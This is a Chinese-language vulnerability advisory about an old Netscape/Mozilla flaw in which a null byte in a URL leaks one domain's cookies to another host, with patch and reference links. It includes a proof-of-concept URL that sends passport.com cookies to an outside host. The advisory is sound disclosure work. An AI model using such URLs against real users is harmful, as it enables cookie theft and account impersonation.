Netscape/Mozilla 空字符插入URL中窃取Cookies漏洞

漏洞信息详情

Netscape/Mozilla 空字符插入URL中窃取Cookies漏洞

漏洞简介

Mozilla是种公开发放、免费使用、开放源码的WEB浏览器,可运行于绝大多数Unix/Linux系统上,也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla,也是一种这样的WEB浏览器。
Cookies常常被WEB站点用来验证用户身份,如果攻击者可以窃取某用户的cookies,就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。
比如在受影响的浏览器中加载如下URL
http://alive.znep.com\\%00www.passport.com/cgi-bin/cookies
将导致\”.passport.com\”这个域对应的cookies被发往\”alive.znep.com\”。注意,这个漏洞只能窃取某个域对应的cookies,无法窃取特定主机对应的cookies。
为利用此漏洞不需要活动脚本的支持。

漏洞公告

临时解决方法:
如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:

* 尽量不要让不可信任的人使用自己的计算机。
厂商补丁:
Mozilla
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

Mozilla Upgrade Mozilla 0.9.7

http://www.mozilla.org/releases/” target=”_blank”>
http://www.mozilla.org/releases/
Netscape
——–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

Netscape Upgrade Netscape 6.2.1

http://home.netscape.com/download/index.html” target=”_blank”>
http://home.netscape.com/download/index.html

参考网址

来源: BID
名称: 3925
链接:http://www.securityfocus.com/bid/3925

来源: XF
名称: mozilla-netscape-steal-cookies(7973)
链接:http://www.iss.net/security_center/static/7973.php

来源: BUGTRAQ
名称: 20020121 Mozilla Cookie Exploit
链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0270.html

来源: alive.znep.com
链接:http://alive.znep.com/~marcs/security/mozillacookie/demo.html

来源:NSFOCUS
名称:2225
链接:http://www.nsfocus.net/vulndb/2225

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享